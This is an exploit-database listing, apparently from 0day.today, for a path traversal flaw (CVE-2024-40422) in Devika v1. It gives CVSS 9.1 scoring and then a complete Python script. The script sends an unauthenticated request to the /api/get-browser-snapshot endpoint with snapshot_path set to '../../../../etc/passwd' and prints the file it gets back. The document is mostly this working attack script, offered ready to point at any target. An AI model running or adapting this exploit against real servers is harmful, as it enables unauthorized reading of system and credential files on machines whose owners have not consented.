Devika v1 - Path Traversal via (snapshot_path) Exploit

2024-08-0400:00:00

Alperen Ergel

0day.today

devika v1

path traversal

snapshot_path

exploit

windows 11

cve-2024-40422

directory traversal

CVSS3

9.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

AI Score

Confidence

Low

JSON

# Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/X)
# Vendor Homepage: https://devikaai.co/
# Software Link: https://github.com/stitionai/devika
# Version: v1
# Tested on: Windows 11 Home Edition
# CVE: CVE-2024-40422

#!/usr/bin/python

import argparse
import requests

def exploit(target_url):
    url = f'http://{target_url}/api/get-browser-snapshot'
    params = {
        'snapshot_path': '../../../../etc/passwd'
    }

    response = requests.get(url, params=params)
    print(response.text)

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')
    parser.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True)
    args = parser.parse_args()

    exploit(args.target)